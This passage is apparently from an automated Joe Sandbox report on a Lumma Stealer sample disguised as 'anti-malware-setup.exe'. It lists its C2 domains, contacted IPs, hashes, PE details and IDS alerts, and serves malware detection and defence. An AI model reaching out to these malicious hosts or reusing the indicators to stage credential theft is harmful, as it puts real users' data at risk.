                                                                                                                                                                                                        https://support.mozilla.org/products/firefoxgro.allBitLockerToGo.exe, 00000003.00000003.2385701315.0000000005BA5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          		high
                                                                                                                                                                                                          https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&amp;l=english&amp;_cBitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            		high
                                                                                                                                                                                                            https://sputnik-1985.com/apiateBitLockerToGo.exe, 00000003.00000003.2454654141.00000000034F3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2432642292.00000000034FC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2454541108.00000000034EE000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2444465530.00000000034FC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2455429001.00000000034F4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown

                                                                                                                                                                                                            World Map of Contacted IPs

                                                                                                                                                                                                            • No. of IPs < 25%
                                                                                                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                                                                                                            • 75% < No. of IPs

                                                                                                                                                                                                            Public IPs

                                                                                                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                            104.21.48.1
                                                                                                                                                                                                            		sputnik-1985.comUnited States
                                                                                                                                                                                                            		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                            104.102.49.254
                                                                                                                                                                                                            		steamcommunity.comUnited States
                                                                                                                                                                                                            		16625AKAMAI-ASUSfalse

                                                                                                                                                                                                            General Information

                                                                                                                                                                                                            Joe Sandbox version:42.0.0 Malachite
                                                                                                                                                                                                            Analysis ID:1587433
                                                                                                                                                                                                            Start date and time:2025-01-10 11:33:07 +01:00
                                                                                                                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                                                                                                                            Overall analysis duration:0h 5m 13s
                                                                                                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                                                                                                            Report type:full
                                                                                                                                                                                                            Cookbook file name:default.jbs
                                                                                                                                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                            Number of analysed new started processes analysed:5
                                                                                                                                                                                                            Number of new started drivers analysed:0
                                                                                                                                                                                                            Number of existing processes analysed:0
                                                                                                                                                                                                            Number of existing drivers analysed:0
                                                                                                                                                                                                            Number of injected processes analysed:0
                                                                                                                                                                                                            Technologies:
                                                                                                                                                                                                            • HCA enabled
                                                                                                                                                                                                            • EGA enabled
                                                                                                                                                                                                            • AMSI enabled
                                                                                                                                                                                                            Analysis Mode:default
                                                                                                                                                                                                            Analysis stop reason:Timeout
                                                                                                                                                                                                            Sample name:anti-malware-setup.exe
                                                                                                                                                                                                            Detection:MAL
                                                                                                                                                                                                            Classification:mal100.troj.spyw.evad.winEXE@3/0@13/2
                                                                                                                                                                                                            EGA Information:
                                                                                                                                                                                                            • Successful, ratio: 50%
                                                                                                                                                                                                            HCA Information:
                                                                                                                                                                                                            • Successful, ratio: 88%
                                                                                                                                                                                                            • Number of executed functions: 33
                                                                                                                                                                                                            • Number of non-executed functions: 113
                                                                                                                                                                                                            Cookbook Comments:
                                                                                                                                                                                                            • Found application associated with file extension: .exe

                                                                                                                                                                                                            Warnings

                                                                                                                                                                                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                                                                                                                                            • Excluded IPs from analysis (whitelisted): 13.107.246.45, 4.175.87.197, 20.3.187.198, 20.109.210.53, 20.12.23.50
                                                                                                                                                                                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                            • Execution Graph export aborted for target anti-malware-setup.exe, PID 4996 because there are no executed function
                                                                                                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                                                                                                            Simulations

                                                                                                                                                                                                            Behavior and APIs

                                                                                                                                                                                                            TimeTypeDescription
                                                                                                                                                                                                            05:34:27API Interceptor11x Sleep call for process: BitLockerToGo.exe modified

                                                                                                                                                                                                            Joe Sandbox View / Context

                                                                                                                                                                                                            IPs

                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                            104.21.48.1SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                                                                                                                                                                                                            • twirpx.org/administrator/index.php
                                                                                                                                                                                                            SN500, SN150 Spec.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                            • www.antipromil.site/7ykh/
                                                                                                                                                                                                            104.102.49.254r4xiHKy8aM.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                                                                                                                            • /ISteamUser/GetFriendList/v1/?key=AE2AE4DBF33A541E83BC08989DB1F397&steamid=76561198400860497
                                                                                                                                                                                                            http://gtm-cn-j4g3qqvf603.steamproxy1.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • www.valvesoftware.com/legal.htm

                                                                                                                                                                                                            Domains

                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                            sputnik-1985.comappFile.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                            • 104.21.80.1
                                                                                                                                                                                                            [UPD]Intel_Unit.2.1.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                            • 104.21.64.1
                                                                                                                                                                                                            Installer.exeGet hashmaliciousLummaC, PureLog StealerBrowse
                                                                                                                                                                                                            • 104.21.96.1
                                                                                                                                                                                                            Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                            • 104.21.80.1
                                                                                                                                                                                                            BnJxmraqlk.exeGet hashmaliciousLummaC, PrivateLoaderBrowse
                                                                                                                                                                                                            • 104.21.48.1
                                                                                                                                                                                                            file.exeGet hashmaliciousAmadey, Babadeda, LummaC Stealer, Poverty Stealer, PureLog StealerBrowse
                                                                                                                                                                                                            • 104.21.96.1
                                                                                                                                                                                                            NjFiIQNSid.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                            • 104.21.112.1
                                                                                                                                                                                                            steamcommunity.comappFile.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                            cache_registerer.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                            Invoice.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                            NvOxePa.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                            h3VYJaQqI9.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                            P2V7Mr3DUF.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                            v3tb7mqP48.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                            asd.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                            [UPD]Intel_Unit.2.1.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                            socolo.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                            • 104.102.49.254

                                                                                                                                                                                                            ASNs

                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                            CLOUDFLARENETUShttps://we.tl/t-fnebgmrnYQGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 104.26.0.90
                                                                                                                                                                                                            appFile.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                            • 104.21.80.1
                                                                                                                                                                                                            Undelivered Messages.htmGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 104.21.84.200
                                                                                                                                                                                                            driver.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                            • 162.159.137.232
                                                                                                                                                                                                            XClient.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                            • 104.20.4.235
                                                                                                                                                                                                            http://www.efnhdh.blogspot.mk/Get hashmaliciousGRQ ScamBrowse
                                                                                                                                                                                                            • 172.67.12.83
                                                                                                                                                                                                            gem1.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                                                                            • 104.26.12.205
                                                                                                                                                                                                            http://pdfdrive.com.coGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 104.21.11.245
                                                                                                                                                                                                            RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                            • 104.21.80.1
                                                                                                                                                                                                            https://ctrk.klclick3.com/l/01JGXREPA9AKCFABSME4GFWDDZ_0#YWxhaW5femllZ2xlckB6aWVnbGVyZ3JvdXAuY29tGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 172.66.43.95
                                                                                                                                                                                                            AKAMAI-ASUSappFile.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                            cache_registerer.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                            armv5l.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 23.209.153.127
                                                                                                                                                                                                            http://postman.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 104.102.43.106
                                                                                                                                                                                                            https://sanctionssearch.ofac.treas.govGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 23.49.251.37
                                                                                                                                                                                                            Fantazy.ppc.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 104.81.98.224
                                                                                                                                                                                                            Fantazy.x86.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 184.28.181.149
                                                                                                                                                                                                            6.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 2.16.79.96
                                                                                                                                                                                                            Invoice.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                            Fantazy.i486.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 104.73.204.147

                                                                                                                                                                                                            JA3 Fingerprints

                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                            a0e9f5d64349fb13191bc781f81f42e1appFile.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                            • 104.21.48.1
                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                            cache_registerer.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                            • 104.21.48.1
                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                            CY SEC AUDIT PLAN 2025.docx.docGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 104.21.48.1
                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                            PO#3_RKG367.batGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                            • 104.21.48.1
                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                            Invoice.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                            • 104.21.48.1
                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                            24EPV9vjc5.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 104.21.48.1
                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                            kXzODlqJak.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 104.21.48.1
                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                            24EPV9vjc5.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 104.21.48.1
                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                            kXzODlqJak.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 104.21.48.1
                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                            cLm7ThwEvh.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 104.21.48.1
                                                                                                                                                                                                            • 104.102.49.254

                                                                                                                                                                                                            Dropped Files

                                                                                                                                                                                                            No context

                                                                                                                                                                                                            Created / dropped Files

                                                                                                                                                                                                            No created / dropped files found

                                                                                                                                                                                                            Static File Info

                                                                                                                                                                                                            General

                                                                                                                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Entropy (8bit):6.329736355393688
                                                                                                                                                                                                            TrID:
                                                                                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 99.53%
                                                                                                                                                                                                            • InstallShield setup (43055/19) 0.43%
                                                                                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                            File name:anti-malware-setup.exe
                                                                                                                                                                                                            File size:4'063'744 bytes
                                                                                                                                                                                                            MD5:fedb69af5de74d46366ad0570e77d9ac
                                                                                                                                                                                                            SHA1:a85c8c91780e9366fafc2aba2d13e5b3a49c37ba
                                                                                                                                                                                                            SHA256:61316bc78fb84aaa2d5fd1e10aec9a8cf96ab5ac7ee1436048eb7fd199045310
                                                                                                                                                                                                            SHA512:1aa337e9aaaaa51651398fb5996356241c818bc6851139769577eb91d332d868edc0b6a53d029efe72f0b74f83551fb3f826d016170c3418b9a8fbfbe668caed
                                                                                                                                                                                                            SSDEEP:49152:Qx0uAJAxX0YdindluiIoFcr/sy/sdHEVjUaw7QNwZ/cKP93:XuA6nUCoFwwg4/cKF
                                                                                                                                                                                                            TLSH:2C161741FACB84F5D9031830515B623B97325E058B28DB9BFA1C7F5AEB7B6924C33249
                                                                                                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........Z=.........................0.........:...@...........................@.....).>...@................................

                                                                                                                                                                                                            File Icon

                                                                                                                                                                                                            Icon Hash:0e13696d692f0f0c

                                                                                                                                                                                                            Static PE Info

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Entrypoint:0x461830
                                                                                                                                                                                                            Entrypoint Section:.text
                                                                                                                                                                                                            Digitally signed:false
                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                            Subsystem:windows gui
                                                                                                                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                            Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                                                                                                                                                                                                            TLS Callbacks:
                                                                                                                                                                                                            CLR (.Net) Version:
                                                                                                                                                                                                            OS Version Major:6
                                                                                                                                                                                                            OS Version Minor:1
                                                                                                                                                                                                            File Version Major:6
                                                                                                                                                                                                            File Version Minor:1
                                                                                                                                                                                                            Subsystem Version Major:6
                                                                                                                                                                                                            Subsystem Version Minor:1
                                                                                                                                                                                                            Import Hash:1aae8bf580c846f39c71c05898e57e88

                                                                                                                                                                                                            Entrypoint Preview

                                                                                                                                                                                                            Instruction
                                                                                                                                                                                                            jmp 00007F4D188B4D70h
                                                                                                                                                                                                            int3
                                                                                                                                                                                                            int3
                                                                                                                                                                                                            int3
                                                                                                                                                                                                            int3
                                                                                                                                                                                                            int3
                                                                                                                                                                                                            int3
                                                                                                                                                                                                            int3
                                                                                                                                                                                                            int3
                                                                                                                                                                                                            int3
                                                                                                                                                                                                            int3
                                                                                                                                                                                                            int3
                                                                                                                                                                                                            sub esp, 28h
                                                                                                                                                                                                            mov dword ptr [esp+1Ch], ebx
                                                                                                                                                                                                            mov dword ptr [esp+10h], ebp
                                                                                                                                                                                                            mov dword ptr [esp+14h], esi
                                                                                                                                                                                                            mov dword ptr [esp+18h], edi
                                                                                                                                                                                                            mov dword ptr [esp], eax
                                                                                                                                                                                                            mov dword ptr [esp+04h], ecx
                                                                                                                                                                                                            call 00007F4D18895BD6h
                                                                                                                                                                                                            mov eax, dword ptr [esp+08h]
                                                                                                                                                                                                            mov edi, dword ptr [esp+18h]
                                                                                                                                                                                                            mov esi, dword ptr [esp+14h]
                                                                                                                                                                                                            mov ebp, dword ptr [esp+10h]
                                                                                                                                                                                                            mov ebx, dword ptr [esp+1Ch]
                                                                                                                                                                                                            add esp, 28h
                                                                                                                                                                                                            retn 0004h
                                                                                                                                                                                                            ret
                                                                                                                                                                                                            int3
                                                                                                                                                                                                            int3
                                                                                                                                                                                                            int3
                                                                                                                                                                                                            int3
                                                                                                                                                                                                            int3
                                                                                                                                                                                                            int3
                                                                                                                                                                                                            sub esp, 08h
                                                                                                                                                                                                            mov ecx, dword ptr [esp+0Ch]
                                                                                                                                                                                                            mov edx, dword ptr [ecx]
                                                                                                                                                                                                            mov eax, esp
                                                                                                                                                                                                            mov dword ptr [edx+04h], eax
                                                                                                                                                                                                            sub eax, 00010000h
                                                                                                                                                                                                            mov dword ptr [edx], eax
                                                                                                                                                                                                            add eax, 000013A0h
                                                                                                                                                                                                            mov dword ptr [edx+08h], eax
                                                                                                                                                                                                            mov dword ptr [edx+0Ch], eax
                                                                                                                                                                                                            lea edi, dword ptr [ecx+34h]
                                                                                                                                                                                                            mov dword ptr [edx+18h], ecx
                                                                                                                                                                                                            mov dword ptr [edi], edx
                                                                                                                                                                                                            mov dword ptr [esp+04h], edi
                                                                                                                                                                                                            call 00007F4D188B71D4h
                                                                                                                                                                                                            cld
                                                                                                                                                                                                            call 00007F4D188B625Eh
                                                                                                                                                                                                            call 00007F4D188B4E99h
                                                                                                                                                                                                            add esp, 08h
                                                                                                                                                                                                            ret
                                                                                                                                                                                                            jmp 00007F4D188B7080h
                                                                                                                                                                                                            int3
                                                                                                                                                                                                            int3
                                                                                                                                                                                                            int3
                                                                                                                                                                                                            int3
                                                                                                                                                                                                            int3
                                                                                                                                                                                                            int3
                                                                                                                                                                                                            int3
                                                                                                                                                                                                            int3
                                                                                                                                                                                                            int3
                                                                                                                                                                                                            int3
                                                                                                                                                                                                            int3
                                                                                                                                                                                                            mov ebx, dword ptr [esp+04h]
                                                                                                                                                                                                            mov ebp, esp
                                                                                                                                                                                                            mov dword ptr fs:[00000034h], 00000000h
                                                                                                                                                                                                            mov ecx, dword ptr [ebx+04h]
                                                                                                                                                                                                            cmp ecx, 00000000h
                                                                                                                                                                                                            je 00007F4D188B7081h
                                                                                                                                                                                                            mov eax, ecx
                                                                                                                                                                                                            shl eax, 02h
                                                                                                                                                                                                            sub esp, eax
                                                                                                                                                                                                            mov edi, esp
                                                                                                                                                                                                            mov esi, dword ptr [ebx+08h]
                                                                                                                                                                                                            cld
                                                                                                                                                                                                            rep movsd

                                                                                                                                                                                                            Data Directories

                                                                                                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x3e90000x44c.idata
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x4000000xa5dc.rsrc
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x3ea0000x14e80.reloc
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x3ad2e00xb4.data
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                            Sections

                                                                                                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                            .text0x10000x1cc9180x1cca00de7919e62c57418dbfd09999ffb8ab32False0.4105156037991859data6.046129796006456IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                            .rdata0x1ce0000x1de7940x1de8007ead1eaaa1a7c1de7ff49f5121c20d16False0.48508318638975967data5.977428201341314IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                            .data0x3ad0000x3b9000x14e0074c2e046786ffbea65358fe81a52647bFalse0.46813014595808383data5.004101632891957IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                            .idata0x3e90000x44c0x600d5b1e111c6227f21350bf56fac3ad0aeFalse0.359375OpenPGP Public Key3.876341617407367IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                            .reloc0x3ea0000x14e800x15000af44cc9ea4a77f0206e8e5757b869a74False0.5860770089285714data6.592979947748528IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                            .symtab0x3ff0000x40x20007b5472d347d42780469fb2654b7fc54False0.02734375data0.020393135236084953IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                            .rsrc0x4000000xa5dc0xa6006558ffbc3772c7a56bf2d0ef24c9158cFalse0.4422769201807229data5.698282689540848IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                            Resources

                                                                                                                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                            RT_ICON0x4002c40x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishUnited States0.7437943262411347
                                                                                                                                                                                                            RT_ICON0x40072c0x6b8Device independent bitmap graphic, 20 x 40 x 32, image size 0EnglishUnited States0.7930232558139535
                                                                                                                                                                                                            RT_ICON0x400de40x988Device independent bitmap graphic, 24 x 48 x 32, image size 0EnglishUnited States0.5868852459016394
                                                                                                                                                                                                            RT_ICON0x40176c0xb20Device independent bitmap graphic, 26 x 52 x 32, image size 0EnglishUnited States0.7124297752808989
                                                                                                                                                                                                            RT_ICON0x40228c0x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishUnited States0.5173545966228893
                                                                                                                                                                                                            RT_ICON0x4033340x1348Device independent bitmap graphic, 34 x 68 x 32, image size 0EnglishUnited States0.5790113452188006
                                                                                                                                                                                                            RT_ICON0x40467c0x1588Device independent bitmap graphic, 36 x 72 x 32, image size 0EnglishUnited States0.2260522496371553
                                                                                                                                                                                                            RT_ICON0x405c040x1a68Device independent bitmap graphic, 40 x 80 x 32, image size 0EnglishUnited States0.38772189349112424
                                                                                                                                                                                                            RT_ICON0x40766c0x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishUnited States0.37935684647302903
                                                                                                                                                                                                            RT_GROUP_ICON0x409c140x84dataEnglishUnited States0.7045454545454546
                                                                                                                                                                                                            RT_VERSION0x409c980x318data0.45580808080808083
                                                                                                                                                                                                            RT_MANIFEST0x409fb00x62cXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.4240506329113924

                                                                                                                                                                                                            Imports

                                                                                                                                                                                                            DLLImport
                                                                                                                                                                                                            kernel32.dllWriteFile, WriteConsoleW, WerSetFlags, WerGetFlags, WaitForMultipleObjects, WaitForSingleObject, VirtualQuery, VirtualFree, VirtualAlloc, TlsAlloc, SwitchToThread, SuspendThread, SetWaitableTimer, SetUnhandledExceptionFilter, SetProcessPriorityBoost, SetEvent, SetErrorMode, SetConsoleCtrlHandler, ResumeThread, RaiseFailFastException, PostQueuedCompletionStatus, LoadLibraryW, LoadLibraryExW, SetThreadContext, GetThreadContext, GetSystemInfo, GetSystemDirectoryA, GetStdHandle, GetQueuedCompletionStatusEx, GetProcessAffinityMask, GetProcAddress, GetErrorMode, GetEnvironmentStringsW, GetCurrentThreadId, GetConsoleMode, FreeEnvironmentStringsW, ExitProcess, DuplicateHandle, CreateWaitableTimerExW, CreateThread, CreateIoCompletionPort, CreateEventA, CloseHandle, AddVectoredExceptionHandler

                                                                                                                                                                                                            Possible Origin

                                                                                                                                                                                                            Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                            EnglishUnited States

                                                                                                                                                                                                            Network Behavior

                                                                                                                                                                                                            Suricata IDS Alerts

                                                                                                                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                            2025-01-10T11:34:27.592980+01002058608ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (enterwahsh .biz)1192.168.2.5499191.1.1.153UDP
                                                                                                                                                                                                            2025-01-10T11:34:27.613414+01002058514ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wordyfindy .lat)1192.168.2.5510231.1.1.153UDP
                                                                                                                                                                                                            2025-01-10T11:34:27.623847+01002058502ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (slipperyloo .lat)1192.168.2.5639761.1.1.153UDP
                                                                                                                                                                                                            2025-01-10T11:34:27.636200+01002058492ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (manyrestro .lat)1192.168.2.5652831.1.1.153UDP
                                                                                                                                                                                                            2025-01-10T11:34:27.646656+01002058500ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (shapestickyr .lat)1192.168.2.5579911.1.1.153UDP
                                                                                                                                                                                                            2025-01-10T11:34:27.658561+01002058510ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (talkynicer .lat)1192.168.2.5570351.1.1.153UDP
                                                                                                                                                                                                            2025-01-10T11:34:27.673815+01002058484ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (curverpluch .lat)1192.168.2.5584831.1.1.153UDP
                                                                                                                                                                                                            2025-01-10T11:34:27.684905+01002058512ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tentabatte .lat)1192.168.2.5502671.1.1.153UDP
                                                                                                                                                                                                            2025-01-10T11:34:27.695225+01002058480ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bashfulacid .lat)1192.168.2.5551491.1.1.153UDP
                                                                                                                                                                                                            2025-01-10T11:34:28.390611+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549770104.102.49.254443TCP
                                                                                                                                                                                                            2025-01-10T11:34:28.908331+01002858666ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup1192.168.2.549770104.102.49.254443TCP
                                                                                                                                                                                                            2025-01-10T11:34:29.481329+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549780104.21.48.1443TCP
                                                                                                                                                                                                            2025-01-10T11:34:29.915029+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.549780104.21.48.1443TCP
                                                                                                                                                                                                            2025-01-10T11:34:29.915029+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549780104.21.48.1443TCP
                                                                                                                                                                                                            2025-01-10T11:34:30.467471+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549787104.21.48.1443TCP
                                                                                                                                                                                                            2025-01-10T11:34:30.952361+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.549787104.21.48.1443TCP
                                                                                                                                                                                                            2025-01-10T11:34:30.952361+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549787104.21.48.1443TCP
